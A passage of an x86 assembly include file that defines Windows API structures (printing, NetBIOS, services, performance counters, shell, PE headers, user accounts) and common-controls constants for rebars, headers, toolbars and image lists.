.pPrinterName RESD 1
.pPortName RESD 1
.Attributes RESD 1
.DeviceNotSelectedTimeout RESD 1
.TransmissionRetryTimeout RESD 1
ENDSTRUC
STRUC DRIVER_INFO_3
.cVersion RESD 1
.pName RESD 1
.pEnvironment RESD 1
.pDriverPath RESD 1
.pDataFile RESD 1
.pConfigFile RESD 1
.pHelpFile RESD 1
.pDependentFiles RESD 1
.pMonitorName RESD 1
.pDefaultDataType RESD 1
ENDSTRUC
STRUC DOC_INFO_2
.pDocName RESD 1
.pOutputFile RESD 1
.pDatatype RESD 1
.dwMode RESD 1
.JobId RESD 1
ENDSTRUC
STRUC PORT_INFO_2
.pPortName RESD 1
.pMonitorName RESD 1
.pDescription RESD 1
.fPortType RESD 1
.Reserved RESD 1
ENDSTRUC
STRUC PROVIDOR_INFO_1
.pName RESD 1
.pEnvironment RESD 1
.pDLLName RESD 1
ENDSTRUC
STRUC NETRESOURCE
.dwScope RESD 1
.dwType RESD 1
.dwDisplayType RESD 1
.dwUsage RESD 1
.lpLocalName RESD 1
.lpRemoteName RESD 1
.lpComment RESD 1
.lpProvider RESD 1
ENDSTRUC
STRUC NCB
.ncb_command RESW 1
.ncb_retcode RESW 1
.ncb_lsn RESW 1
.ncb_num RESW 1
.ncb_buffer RESD 1
.ncb_length RESW 1
.ncb_callname RESB NCBNAMSZ
.ncb_name RESB NCBNAMSZ
.ncb_rto RESW 1
.ncb_sto RESW 1
.ncb_post RESD 1
.ncb_lana_num RESW 1
.ncb_cmd_cplt RESW 1
.ncb_reserve10 RESB 1
.ncb_event RESD 1
ENDSTRUC
STRUC ADAPTER_STATUS
.adapter_address RESB 6
.rev_major RESW 1
.reserved0 RESW 1
.adapter_type RESW 1
.rev_minor RESW 1
.duration RESW 1
.frmr_recv RESW 1
.frmr_xmit RESW 1
.iframe_recv_err RESW 1
.xmit_aborts RESW 1
.xmit_success RESD 1
.recv_success RESD 1
.iframe_xmit_err RESW 1
.recv_buff_unavail RESW 1
.t1_timeouts RESW 1
.ti_timeouts RESW 1
.Reserved1 RESD 1
.free_ncbs RESW 1
.max_cfg_ncbs RESW 1
.max_ncbs RESW 1
.xmit_buf_unavail RESW 1
.max_dgram_isize RESW 1
.pending_sess RESW 1
.max_cfg_sess RESW 1
.max_sess RESW 1
.max_sess_pkt_isize RESW 1
.name_count RESW 1
ENDSTRUC
STRUC NAME_BUFFER
.xname RESB NCBNAMSZ
.name_num RESW 1
.name_flags RESW 1
ENDSTRUC
STRUC SESSION_HEADER
.sess_name RESW 1
.num_sess RESW 1
.rcv_dg_outstanding RESW 1
.rcv_any_outstanding RESW 1
ENDSTRUC
STRUC SESSION_BUFFER
.lsn RESW 1
.State RESW 1
.local_name RESB NCBNAMSZ
.remote_name RESB NCBNAMSZ
.rcvs_outstanding RESW 1
.sends_outstanding RESW 1
ENDSTRUC
STRUC LANA_ENUM
.iLength RESW 1
.lana RESW 1
ENDSTRUC
STRUC FIND_NAME_HEADER
.node_count RESW 1
.Reserved RESW 1
.unique_group RESW 1
ENDSTRUC
STRUC FIND_NAME_BUFFER
.iLength RESW 1
.access_control RESW 1
.frame_control RESW 1
.destination_addr RESW 1
.source_addr RESW 1
.routing_info RESW 1
ENDSTRUC
STRUC ACTION_HEADER
.transport_id RESD 1
.action_code RESW 1
.Reserved RESW 1
ENDSTRUC
STRUC CRGB
.bRed RESB 1
.bGreen RESB 1
.bBlue RESB 1
.bExtra RESB 1
ENDSTRUC
STRUC SERVICE_STATUS
.dwServiceType RESD 1
.dwCurrentState RESD 1
.dwControlsAccepted RESD 1
.dwWin32ExitCode RESD 1
.dwServiceSpecificExitCode RESD 1
.dwCheckPoint RESD 1
.dwWaitHint RESD 1
ENDSTRUC
STRUC ENUM_SERVICE_STATUS
.lpServiceName RESD 1
.lpDisplayName RESD 1
.ServiceStatus RESD 1
ENDSTRUC
STRUC QUERY_SERVICE_LOCK_STATUS
.fIsLocked RESD 1
.lpLockOwner RESD 1
.dwLockDuration RESD 1
ENDSTRUC
STRUC QUERY_SERVICE_CONFIG
.dwServiceType RESD 1
.dwStartType RESD 1
.dwErrorControl RESD 1
.lpBinaryPathName RESD 1
.lpLoadOrderGroup RESD 1
.dwTagId RESD 1
.lpDependencies RESD 1
.lpServiceStartName RESD 1
.lpDisplayName RESD 1
ENDSTRUC
STRUC SERVICE_TABLE_ENTRY
.lpServiceName RESD 1
.lpServiceProc RESD 1
ENDSTRUC
STRUC LARGE_INTEGER
.lowpart RESD 1
.highpart RESD 1
ENDSTRUC
STRUC PERF_DATA_BLOCK
.Signature RESB 4
.LittleEndian RESD 1
.Version RESD 1
.Revision RESD 1
.TotalByteiLength RESD 1
.HeaderiLength RESD 1
.NumObjectTypes RESD 1
.DefaultObject RESD 1
.SystemTime RESD 1
.PerfTime RESD 1
.PerfFreq RESD 1
.PerTime100nSec RESD 1
.SystemNameiLength RESD 1
.SystemNameOffset RESD 1
ENDSTRUC
STRUC PERF_OBJECT_TYPE
.TotalByteiLength RESD 1
.DefinitioniLength RESD 1
.HeaderiLength RESD 1
.ObjectNameTitleIndex RESD 1
.ObjectNameTitle RESD 1
.ObjectHelpTitleIndex RESD 1
.ObjectHelpTitle RESD 1
.DetailLevel RESD 1
.NumCounters RESD 1
.DefaultCounter RESD 1
.NumInstances RESD 1
.CodePage RESD 1
.PerfTime RESD 1
.PerfFreq RESD 1
ENDSTRUC
STRUC PERF_COUNTER_DEFINITION
.ByteiLength RESD 1
.CounterNameTitleIndex RESD 1
.CounterNameTitle RESD 1
.CounterHelpTitleIndex RESD 1
.CounterHelpTitle RESD 1
.DefaultScale RESD 1
.DetailLevel RESD 1
.CounterType RESD 1
.CounterSize RESD 1
.CounterOffset RESD 1
ENDSTRUC
STRUC PERF_INSTANCE_DEFINITION
.ByteiLength RESD 1
.ParentObjectTitleIndex RESD 1
.ParentObjectInstance RESD 1
.UniqueID RESD 1
.NameOffset RESD 1
.NameiLength RESD 1
ENDSTRUC
STRUC PERF_COUNTER_BLOCK
.ByteiLength RESD 1
ENDSTRUC
STRUC COMPOSITIONFORM
.dwStyle RESD 1
.ptCurrentPos RESB POINT_size
.rcArea RESB RECT_size
ENDSTRUC
STRUC CANDIDATEFORM
.dwIndex RESD 1
.dwStyle RESD 1
.ptCurrentPos RESB POINT_size
.rcArea RESB RECT_size
ENDSTRUC
STRUC CANDIDATELIST
.dwSize RESD 1
.dwStyle RESD 1
.dwCount RESD 1
.dwSelection RESD 1
.dwPageStart RESD 1
.dwPageSize RESD 1
.dwOffset1 RESD 1
ENDSTRUC
STRUC STYLEBUF
.dwStyle RESD 1
.szDescription RESB STYLE_DESCRIPTION_SIZE
ENDSTRUC
STRUC MODEMDEVCAPS
.dwActualSize RESD 1
.dwRequiredSize RESD 1
.dwDevSpecificOffset RESD 1
.dwDevSpecificSize RESD 1
.dwModemProviderVersion RESD 1
.dwModemManufacturerOffset RESD 1
.dwModemManufacturerSize RESD 1
.dwModemModelOffset RESD 1
.dwModemModelSize RESD 1
.dwModemVersionOffset RESD 1
.dwModemVersionSize RESD 1
.dwDialOptions RESD 1
.dwCallSetupFailTimer RESD 1
.dwInactivityTimeout RESD 1
.dwSpeakerVolume RESD 1
.dwSpeakerMode RESD 1
.dwModemOptions RESD 1
.dwMaxDTERate RESD 1
.dwMaxDCERate RESD 1
.abVariablePortion RESB 1
ENDSTRUC
STRUC MODEMSETTINGS
.dwActualSize RESD 1
.dwRequiredSize RESD 1
.dwDevSpecificOffset RESD 1
.dwDevSpecificSize RESD 1
.dwCallSetupFailTimer RESD 1
.dwInactivityTimeout RESD 1
.dwSpeakerVolume RESD 1
.dwSpeakerMode RESD 1
.dwPreferredModemOptions RESD 1
.dwNegotiatedModemOptions RESD 1
.dwNegotiatedDCERate RESD 1
.abVariablePortion RESB 1
ENDSTRUC
STRUC DRAGINFO
.uSize RESD 1
.pt RESB POINT_size
.fNC RESD 1
.lpFileList RESD 1
.grfKeyState RESD 1
ENDSTRUC
STRUC APPBARDATA
.cbSize RESD 1
.hwnd RESD 1
.uCallbackMessage RESD 1
.uEdge RESD 1
.rc RESB RECT_size
.lParam RESD 1
ENDSTRUC
STRUC SHFILEOPSTRUCT
.hwnd RESD 1
.wFunc RESD 1
.pFrom RESD 1
.pTo RESD 1
.fFlags RESW 1
.fAnyOperationsAborted RESD 1
.hNameMappings RESD 1
.lpszProgressTitle RESD 1
ENDSTRUC
STRUC SHNAMEMAPPING
.pszOldPath RESD 1
.pszNewPath RESD 1
.cchOldPath RESD 1
.cchNewPath RESD 1
ENDSTRUC
STRUC SHELLEXECUTEINFO
.cbSize RESD 1
.fMask RESD 1
.hwnd RESD 1
.lpVerb RESD 1
.lpFile RESD 1
.lpParameters RESD 1
.lpDirectory RESD 1
.nShow RESD 1
.hInstApp RESD 1
.lpIDList RESD 1
.lpClass RESD 1
.hkeyClass RESD 1
.dwHotKey RESD 1
.hIcon RESD 1
.hProcess RESD 1
ENDSTRUC
STRUC NOTIFYICONDATA
.cbSize RESD 1
.hwnd RESD 1
.uID RESD 1
.uFlags RESD 1
.uCallbackMessage RESD 1
.hIcon RESD 1
.szTip RESB 64
ENDSTRUC
STRUC SHFILEINFO
.hIcon RESD 1
.iIcon RESD 1
.dwAttributes RESD 1
.szDisplayName RESB 1
.szTypeName RESB 80
ENDSTRUC
STRUC VS_FIXEDFILEINFO
.dwSignature RESD 1
.dwStrucVersion RESD 1
.dwFileVersionMS RESD 1
.dwFileVersionLS RESD 1
.dwProductVersionMS RESD 1
.dwProductVersionLS RESD 1
.dwFileFlagsMask RESD 1
.dwFileFlags RESD 1
.dwFileOS RESD 1
.dwFileType RESD 1
.dwFileSubtype RESD 1
.dwFileDateMS RESD 1
.dwFileDateLS RESD 1
ENDSTRUC
STRUC ICONMETRICS
.cbSize RESD 1
.iHorzSpacing RESD 1
.iVertSpacing RESD 1
.iTitleWrap RESD 1
.lfFont RESD 1
ENDSTRUC
STRUC HELPINFO
.cbSize RESD 1
.iContextType RESD 1
.iCtrlId RESD 1
.hItemHandle RESD 1
.dwContextId RESD 1
.MousePos RESD 1
ENDSTRUC
STRUC ANIMATIONINFO
.cbSize RESD 1
.iMinAnimate RESD 1
ENDSTRUC
STRUC MINIMIZEDMETRICS
.cbSize RESD 1
.iWidth RESD 1
.iHorzGap RESD 1
.iVertGap RESD 1
.iArrange RESD 1
.lfFont RESD 1
ENDSTRUC
STRUC OSVERSIONINFO
.dwOSVersionInfoSize RESD 1
.dwMajorVersion RESD 1
.dwMinorVersion RESD 1
.dwBuildNumber RESD 1
.dwPlatformId RESD 1
.szCSDVersion RESB 128
ENDSTRUC
STRUC SYSTEM_POWER_STATUS
.ACLineStatus RESB 1
.BatteryFlag RESB 1
.BatteryLifePercent RESB 1
.Reserved1 RESB 1
.BatteryLifeTime RESD 1
.BatteryFullLifeTime RESD 1
ENDSTRUC
STRUC NMHDR
.hwndFrom RESD 1
.idfrom RESD 1
.code RESD 1
ENDSTRUC
STRUC DEVNAMES
.wDriverOffset RESW 1
.wDeviceOffset RESW 1
.wOutputOffset RESW 1
.wDefault RESW 1
ENDSTRUC
STRUC PAGESETUPDLGAPI
.lStructSize RESD 1
.hwndOwner RESD 1
.hDevMode RESD 1
.hDevNames RESD 1
.flags RESD 1
.ptPaperSize RESB POINT_size
.rtMinMargin RESD 1
.rtMargin RESD 1
.hInstance RESD 1
.lCustData RESD 1
.lpfnPageSetupHook RESD 1
.lpfnPagePaintHook RESD 1
.lpPageSetupTemplateName RESD 1
.hPageSetupTemplate RESD 1
ENDSTRUC
STRUC COMMCONFIG
.dwSize RESD 1
.wVersion RESW 1
.wReserved RESW 1
.dcbx RESD 1
.dwProviderSubType RESD 1
.dwProviderOffset RESD 1
.dwProviderSize RESD 1
.wcProviderData RESB 1
ENDSTRUC
STRUC PIXELFORMATDESCRIPTOR
.nSize RESW 1
.nVersion RESW 1
.dwFlags RESD 1
.iPixelType RESB 1
.cColorBits RESB 1
.cRedBits RESB 1
.cRedShift RESB 1
.cGreenBits RESB 1
.cGreenShift RESB 1
.cBlueBits RESB 1
.cBlueShift RESB 1
.cAlphaBits RESB 1
.cAlphaShift RESB 1
.cAccumBits RESB 1
.cAccumRedBits RESB 1
.cAccumGreenBits RESB 1
.cAccumBlueBits RESB 1
.cAccumAlphaBits RESB 1
.cDepthBits RESB 1
.cStencilBits RESB 1
.cAuxBuffers RESB 1
.iLayerType RESB 1
.bReserved RESB 1
.dwLayerMask RESD 1
.dwVisibleMask RESD 1
.dwDamageMask RESD 1
ENDSTRUC
STRUC DRAWTEXTPARAMS
.cbSize RESD 1
.iTabiLength RESD 1
.iLeftMargin RESD 1
.iRightMargin RESD 1
.uiiLengthDrawn RESD 1
ENDSTRUC
STRUC MENUITEMINFO
.cbSize RESD 1
.fMask RESD 1
.fType RESD 1
.fState RESD 1
.wID RESD 1
.hSubMenu RESD 1
.hbmpChecked RESD 1
.hbmpUnchecked RESD 1
.dwItemData RESD 1
.dwTypeData RESD 1
.cch RESD 1
ENDSTRUC
STRUC SCROLLINFO
.cbSize RESD 1
.fMask RESD 1
.nMin RESD 1
.nMax RESD 1
.nPage RESD 1
.nPos RESD 1
.nTrackPos RESD 1
ENDSTRUC
STRUC MSGBOXPARAMS
.cbSize RESD 1
.hwndOwner RESD 1
.hInstance RESD 1
.lpszText RESD 1
.lpszCaption RESD 1
.dwStyle RESD 1
.lpszIcon RESD 1
.dwContextHelpId RESD 1
.lpfnMsgBoxCallback RESD 1
.dwLanguageId RESD 1
ENDSTRUC
STRUC DEBUG_EVENT
.dwDebugEventCode RESD 1
.dwProcessId RESD 1
.dwThreadId RESD 1
.u RESD 1
ENDSTRUC
STRUC COLORMAP
.cmFrom RESD 1
.cmTo RESD 1
ENDSTRUC
STRUC AuxVol
.vLow RESW 1
.vHigh RESW 1
ENDSTRUC
STRUC DBGTHREAD
.hThread RESD 1
.lpStartAddress RESD 1
.bfState RESD 1
.nNext RESQ 1
ENDSTRUC
STRUC DbgProcess
.hDbgHeap RESD 1
.dwProcessID RESD 1
.dwThreadID RESD 1
.hProcess RESD 1
.hFile RESD 1
.lpImage RESD 1
ENDSTRUC
STRUC IMAGE_DATA_DIRECTORY
.VirtualAddress RESD 1
.isize RESD 1
ENDSTRUC
STRUC IMAGE_OPTIONAL_HEADER
.Magic RESW 1
.MajorLinkerVersion RESB 1
.MinorLinkerVersion RESB 1
.SizeOfCode RESD 1
.SizeOfInitializedData RESD 1
.SizeOfUninitializedData RESD 1
.AddressOfEntryPoint RESD 1
.BaseOfCode RESD 1
.BaseOfData RESD 1
.ImageBase RESD 1
.SectionAlignment RESD 1
.FileAlignment RESD 1
.MajorOperatingSystemVersion RESW 1
.MinorOperatingSystemVersion RESW 1
.MajorImageVersion RESW 1
.MinorImageVersion RESW 1
.MajorSubsystemVersion RESW 1
.MinorSubsystemVersion RESW 1
.Reserved1 RESD 1
.SizeOfImage RESD 1
.SizeOfHeaders RESD 1
.CheckSum RESD 1
.Subsystem RESW 1
.DllCharacteristics RESW 1
.SizeOfStackReserve RESD 1
.SizeOfStackCommit RESD 1
.SizeOfHeapReserve RESD 1
.SizeOfHeapCommit RESD 1
.LoaderFlags RESD 1
.NumberOfRvaAndSizes RESD 1
.DataDirectory RESQ 1
ENDSTRUC
STRUC IMAGE_FILE_HEADER
.Machine RESW 1
.NumberOfSections RESW 1
.TimeDateStamp RESD 1
.PointerToSymbolTable RESD 1
.NumberOfSymbols RESD 1
.SizeOfOptionalHeader RESW 1
.Characteristics RESW 1
ENDSTRUC
STRUC IMAGE_NT_HEADERS
.Signature RESD 1
.FileHeader RESD 1
.OptionalHeader RESD 1
ENDSTRUC
STRUC IMAGE_EXPORT_DIRECTORY
.Characteristics RESD 1
.TimeDateStamp RESD 1
.MajorVersion RESW 1
.MinorVersion RESW 1
.nName RESD 1
.nBase RESD 1
.NumberOfFunctions RESD 1
.NumberOfNames RESD 1
.AddressOfFunctions RESD 1
.AddressOfNames RESD 1
.AddressOfNameOrdinals RESW 1
ENDSTRUC
STRUC IMAGE_DOS_HEADER
.e_magic RESW 1
.e_cblp RESW 1
.e_cp RESW 1
.e_crlc RESW 1
.e_cparhdr RESW 1
.e_minalloc RESW 1
.e_maxalloc RESW 1
.e_ss RESW 1
.e_sp RESW 1
.e_csum RESW 1
.e_ip RESW 1
.e_cs RESW 1
.e_lfarlc RESW 1
.e_ovno RESW 1
.e_res4 RESW 1
.e_oemid RESW 1
.e_oeminfo RESW 1
.e_res2 RESW 1
.e_lfanew RESD 1
ENDSTRUC
STRUC USER_INFO_3
.uName RESD 1
.Password RESD 1
.PasswordAge RESD 1
.Privilege RESD 1
.HomeDir RESD 1
.Comment RESD 1
.Flags RESD 1
.ScriptPath RESD 1
.AuthFlags RESD 1
.FullName RESD 1
.UserComment RESD 1
.Parms RESD 1
.Workstations RESD 1
.LastLogon RESD 1
.LastLogoff RESD 1
.AcctExpires RESD 1
.MaxStorage RESD 1
.UnitsPerWeek RESD 1
.LogonHours RESD 1
.BadPwCount RESD 1
.NumLogons RESD 1
.LogonServer RESD 1
.CountryCode RESD 1
.CodePage RESD 1
.UserID RESD 1
.PrimaryGroupID RESD 1
.Profile RESD 1
.HomeDirDrive RESD 1
.PasswordExpired RESD 1
ENDSTRUC
STRUC GROUP_INFO_2
.uName RESD 1
.Comment RESD 1
.GroupID RESD 1
.Attributes RESD 1
ENDSTRUC
;---------------------------comctl equates-------------------------------
ODT_HEADER equ 100
ODT_TAB equ 101
ODT_LISTVIEW equ 102
LVM_FIRST equ 1000h
TV_FIRST equ 1100h
HDM_FIRST equ 1200h
NM_OUTOFMEMORY equ NM_FIRST-1
NM_CLICK equ NM_FIRST-2
NM_DBLCLK equ NM_FIRST-3
NM_RETURN equ NM_FIRST-4
NM_RCLICK equ NM_FIRST-5
NM_RDBLCLK equ NM_FIRST-6
NM_SETFOCUS equ NM_FIRST-7
NM_KILLFOCUS equ NM_FIRST-8
CCS_TOP equ 00000001h
CCS_NOMOVEY equ 00000002h
CCS_BOTTOM equ 00000003h
CCS_NORESIZE equ 00000004h
CCS_NOPARENTALIGN equ 00000008h
CCS_ADJUSTABLE equ 00000020h
CCS_NODIVIDER equ 00000040h
CCM_FIRST equ 2000h
CCM_SETBKCOLOR equ CCM_FIRST+1
CCM_SETCOLORSCHEME equ CCM_FIRST+2
CCM_GETCOLORSCHEME equ CCM_FIRST+3
CCM_GETDROPTARGET equ CCM_FIRST+4
CCM_SETUNICODEFORMAT equ CCM_FIRST+5
CCM_GETUNICODEFORMAT equ CCM_FIRST+6
LVN_FIRST equ 0-100
LVN_LAST equ 0-199
HDN_FIRST equ 0-300
HDN_LAST equ 0-399
TVN_FIRST equ 0-400
TVN_LAST equ 0-499
TTN_FIRST equ 0-520
TTN_LAST equ 0-549
TCN_FIRST equ 0-550
TCN_LAST equ 0-580
CDN_FIRST equ 0-601
CDN_LAST equ 0-699
TBN_FIRST equ 0-700
TBN_LAST equ 0-720
UDN_FIRST equ 0-721
UDN_LAST equ 0-740
MCN_FIRST equ 0-750
MCN_LAST equ 0-759
DTN_FIRST equ 0-760
DTN_LAST equ 0-799
CBEN_FIRST equ 0-800
CBEN_LAST equ 0-830
RBN_FIRST equ 0-831
RBN_LAST equ 0-859
IPN_FIRST equ 0-860
IPN_LAST equ 0-879
SBN_FIRST equ 0-880
SBN_LAST equ 0-899
PGN_FIRST equ 0-900
PGN_LAST equ 0-950
MSGF_COMMCTRL_BEGINDRAG equ 4200h
MSGF_COMMCTRL_SIZEHEADER equ 4201h
MSGF_COMMCTRL_DRAGSELECT equ 4202h
MSGF_COMMCTRL_TOOLBARCUST equ 4203h
ICC_LISTVIEW_CLASSES equ 00000001h
ICC_TREEVIEW_CLASSES equ 00000002h
ICC_BAR_CLASSES equ 00000004h
ICC_TAB_CLASSES equ 00000008h
ICC_UPDOWN_CLASS equ 00000010h
ICC_PROGRESS_CLASS equ 00000020h
ICC_HOTKEY_CLASS equ 00000040h
ICC_ANIMATE_CLASS equ 00000080h
ICC_WIN95_CLASSES equ 000000FFh
ICC_DATE_CLASSES equ 00000100h
ICC_USEREX_CLASSES equ 00000200h
ICC_COOL_CLASSES equ 00000400h
ICC_INTERNET_CLASSES equ 00000800h
ICC_PAGESCROLLER_CLASS equ 00001000h
ICC_NATIVEFNTCTL_CLASS equ 00002000h
RBIM_IMAGELIST equ 00000001h
RBS_TOOLTIPS equ 0100h
RBS_VARHEIGHT equ 0200h
RBS_BANDBORDERS equ 0400h
RBS_FIXEDORDER equ 0800h
RBS_REGISTERDROP equ 1000h
RBS_AUTOSIZE equ 2000h
RBS_VERTICALGRIPPER equ 4000h
RBS_DBLCLKTOGGLE equ 8000h
RBBS_BREAK equ 00000001h
RBBS_FIXEDSIZE equ 00000002h
RBBS_CHILDEDGE equ 00000004h
RBBS_HIDDEN equ 00000008h
RBBS_NOVERT equ 00000010h
RBBS_FIXEDBMP equ 00000020h
RBBS_VARIABLEHEIGHT equ 00000040h
RBBS_GRIPPERALWAYS equ 00000080h
RBBS_NOGRIPPER equ 00000100h
RBBIM_STYLE equ 00000001h
RBBIM_COLORS equ 00000002h
RBBIM_TEXT equ 00000004h
RBBIM_IMAGE equ 00000008h
RBBIM_CHILD equ 00000010h
RBBIM_CHILDSIZE equ 00000020h
RBBIM_SIZE equ 00000040h
RBBIM_BACKGROUND equ 00000080h
RBBIM_ID equ 00000100h
RBBIM_IDEALSIZE equ 00000200h
RBBIM_LPARAM equ 00000400h
RBBIM_HEADERSIZE equ 00000800h
RB_INSERTBAND equ WM_USER+1
RB_DELETEBAND equ WM_USER+2
RB_GETBARINFO equ WM_USER+3
RB_SETBARINFO equ WM_USER+4
RB_GETBANDINFO equ WM_USER+5
RB_SETBANDINFO equ WM_USER+6
RB_SETPARENT equ WM_USER+7
RB_HITTEST equ WM_USER+8
RB_GETRECT equ WM_USER+9
RB_GETBANDCOUNT equ WM_USER+12
RB_GETROWCOUNT equ WM_USER+13
RB_GETROWHEIGHT equ WM_USER+14
RB_IDTOINDEX equ WM_USER+16
RB_GETTOOLTIPS equ WM_USER+17
RB_SETTOOLTIPS equ WM_USER+18
RB_SETBKCOLOR equ WM_USER+19
RB_GETBKCOLOR equ WM_USER+20
RB_SETTEXTCOLOR equ WM_USER+21
RB_GETTEXTCOLOR equ WM_USER+22
RB_SIZETORECT equ WM_USER+23
RB_SETCOLORSCHEME equ CCM_SETCOLORSCHEME
RB_GETCOLORSCHEME equ CCM_GETCOLORSCHEME
RB_BEGINDRAG equ WM_USER+24
RB_ENDDRAG equ WM_USER+25
RB_DRAGMOVE equ WM_USER+26
RB_GETBARHEIGHT equ WM_USER+27
RB_MINIMIZEBAND equ WM_USER+30
RB_MAXIMIZEBAND equ WM_USER+31
RB_GETDROPTARGET equ CCM_GETDROPTARGET
RB_GETBANDBORDERS equ WM_USER+34
RB_SHOWBAND equ WM_USER+35
RB_SETPALETTE equ WM_USER+37
RB_GETPALETTE equ WM_USER+38
RB_MOVEBAND equ WM_USER+39
RB_SETUNICODEFORMAT equ CCM_SETUNICODEFORMAT
RB_GETUNICODEFORMAT equ CCM_GETUNICODEFORMAT
RBN_HEIGHTCHANGE equ RBN_FIRST-0
RBN_GETOBJECT equ RBN_FIRST-1
RBN_LAYOUTCHANGED equ RBN_FIRST-2
RBN_AUTOSIZE equ RBN_FIRST-3
RBN_BEGINDRAG equ RBN_FIRST-4
RBN_ENDDRAG equ RBN_FIRST-5
RBN_DELETINGBAND equ RBN_FIRST-6
RBN_DELETEDBAND equ RBN_FIRST-7
RBN_CHILDSIZE equ RBN_FIRST-8
RBNM_ID equ 00000001h
RBNM_STYLE equ 00000002h
RBNM_LPARAM equ 00000004h
RBHT_NOWHERE equ 0001h
RBHT_CAPTION equ 0002h
RBHT_CLIENT equ 0003h
RBHT_GRABBER equ 0004h
CLR_NONE equ 0FFFFFFFFh
CLR_DEFAULT equ 0FF000000h
ILC_MASK equ 0001h
ILC_COLOR equ 0000h
ILC_COLORDDB equ 00FEh
ILC_COLOR4 equ 0004h
ILC_COLOR8 equ 0008h
ILC_COLOR16 equ 0010h
ILC_COLOR24 equ 0018h
ILC_COLOR32 equ 0020h
ILC_PALETTE equ 0800h
ILD_NORMAL equ 0000h
ILD_TRANSPARENT equ 0001h
ILD_MASK equ 0010h
ILD_IMAGE equ 0020h
ILD_BLEND25 equ 0002h
ILD_BLEND50 equ 0004h
ILD_OVERLAYMASK equ 0F00h
ILD_SELECTED equ ILD_BLEND50
ILD_FOCUS equ ILD_BLEND25
ILD_BLEND equ ILD_BLEND50
CLR_HILIGHT equ CLR_DEFAULT
HDS_HORZ equ 00000000h
HDS_BUTTONS equ 00000002h
HDS_HIDDEN equ 00000008h
HDI_WIDTH equ 0001h
HDI_HEIGHT equ HDI_WIDTH
HDI_TEXT equ 0002h
HDI_FORMAT equ 0004h
HDI_LPARAM equ 0008h
HDI_BITMAP equ 0010h
HDF_LEFT equ 0
HDF_RIGHT equ 1
HDF_CENTER equ 2
HDF_JUSTIFYMASK equ 0003h
HDF_RTLREADING equ 4
HDF_OWNERDRAW equ 8000h
HDF_STRING equ 4000h
HDF_BITMAP equ 2000h
HDM_GETITEMCOUNT equ HDM_FIRST+0
HDM_INSERTITEM equ HDM_FIRST+1
HDM_INSERTITEMW equ HDM_FIRST+10
HDM_DELETEITEM equ HDM_FIRST+2
HDM_GETITEM equ HDM_FIRST+3
HDM_GETITEMW equ HDM_FIRST+11
HDM_SETITEM equ HDM_FIRST+4
HDM_SETITEMW equ HDM_FIRST+12
HDM_LAYOUT equ HDM_FIRST+5
HHT_NOWHERE equ 0001h
HHT_ONHEADER equ 0002h
HHT_ONDIVIDER equ 0004h
HHT_ONDIVOPEN equ 0008h
HHT_ABOVE equ 0100h
HHT_BELOW equ 0200h
HHT_TORIGHT equ 0400h
HHT_TOLEFT equ 0800h
HDM_HITTEST equ HDM_FIRST+6
HDN_ITEMCHANGING equ HDN_FIRST-0
HDN_ITEMCHANGINGW equ HDN_FIRST-20
HDN_ITEMCHANGED equ HDN_FIRST-1
HDN_ITEMCHANGEDW equ HDN_FIRST-21
HDN_ITEMCLICK equ HDN_FIRST-2
HDN_ITEMCLICKW equ HDN_FIRST-22
HDN_ITEMDBLCLICK equ HDN_FIRST-3
HDN_ITEMDBLCLICKW equ HDN_FIRST-23
HDN_DIVIDERDBLCLICK equ HDN_FIRST-5
HDN_DIVIDERDBLCLICKW equ HDN_FIRST-25
HDN_BEGINTRACK equ HDN_FIRST-6
HDN_BEGINTRACKW equ HDN_FIRST-26
HDN_ENDTRACK equ HDN_FIRST-7
HDN_ENDTRACKW equ HDN_FIRST-27
HDN_TRACK equ HDN_FIRST-8
HDN_TRACKW equ HDN_FIRST-28
CMB_MASKED equ 02h
TBSTATE_CHECKED equ 01h
TBSTATE_PRESSED equ 02h
TBSTATE_ENABLED equ 04h
TBSTATE_HIDDEN equ 08h
TBSTATE_INDETERMINATE equ 10h
TBSTATE_WRAP equ 20h
TBSTYLE_BUTTON equ 00h
TBSTYLE_SEP equ 01h
TBSTYLE_CHECK equ 02h
TBSTYLE_GROUP equ 04h
TBSTYLE_CHECKGROUP equ TBSTYLE_GROUP|TBSTYLE_CHECK
TBSTYLE_TOOLTIPS equ 0100h
TBSTYLE_WRAPABLE equ 0200h
TBSTYLE_ALTDRAG equ 0400h
TBSTYLE_FLAT equ 0800h
TBSTYLE_LIST equ 1000h
TBSTYLE_CUSTOMERASE equ 2000h
TBSTYLE_REGISTERDROP equ 4000h
TBSTYLE_TRANSPARENT equ 8000h
TB_ENABLEBUTTON equ WM_USER+1
TB_CHECKBUTTON equ WM_USER+2
TB_PRESSBUTTON equ WM_USER+3
TB_HIDEBUTTON equ WM_USER+4
TB_INDETERMINATE equ WM_USER+5
TB_ISBUTTONENABLED equ WM_USER+9
TB_ISBUTTONCHECKED equ WM_USER+10
TB_ISBUTTONPRESSED equ WM_USER+11
TB_ISBUTTONHIDDEN equ WM_USER+12
TB_ISBUTTONINDETERMINATE equ WM_USER+13
TB_SETSTATE equ WM_USER+17
TB_GETSTATE equ WM_USER+18
TB_ADDBITMAP equ WM_USER+19
TB_SETSTYLE equ WM_USER+56
TB_GETSTYLE equ WM_USER+57
HINST_COMMCTRL equ -1
IDB_STD_SMALL_COLOR equ 0
IDB_STD_LARGE_COLOR equ 1
IDB_VIEW_SMALL_COLOR equ 4
IDB_VIEW_LARGE_COLOR equ 5
STD_CUT equ 0
STD_COPY equ 1
STD_PASTE equ 2
STD_UNDO equ 3
STD_REDOW equ 4
STD_DELETE equ 5
STD_FILENEW equ 6
STD_FILEOPEN equ 7
STD_FILESAVE equ 8
STD_PRINTPRE equ 9
STD_PROPERTIES equ 10
STD_HELP equ 11
STD_FIND equ 12
STD_REPLACE equ 13
STD_PRINT equ 14
VIEW_LARGEICONS equ 0
VIEW_SMALLICONS equ 1
VIEW_LIST equ 2
VIEW_DETAILS equ 3
VIEW_SORTNAME equ 4
VIEW_SORTSIZE equ 5
VIEW_SORTDATE equ 6
VIEW_SORTTYPE equ 7
VIEW_PARENTFOLDER equ 8
VIEW_NETCONNECT equ 9
VIEW_NETDISCONNECT equ 10
VIEW_NEWFOLDER equ 11
TB_ADDBUTTONS equ WM_USER+20
TB_INSERTBUTTON equ WM_USER+21
TB_DELETEBUTTON equ WM_USER+22
TB_GETBUTTON equ WM_USER+23
TB_BUTTONCOUNT equ WM_USER+24
TB_COMMANDTOINDEX equ WM_USER+25
TB_SAVERESTORE equ WM_USER+26
TB_SAVERESTOREW equ WM_USER+76
TB_CUSTOMIZE equ WM_USER+27
TB_ADDSTRING equ WM_USER+28
TB_ADDSTRINGW equ WM_USER+77
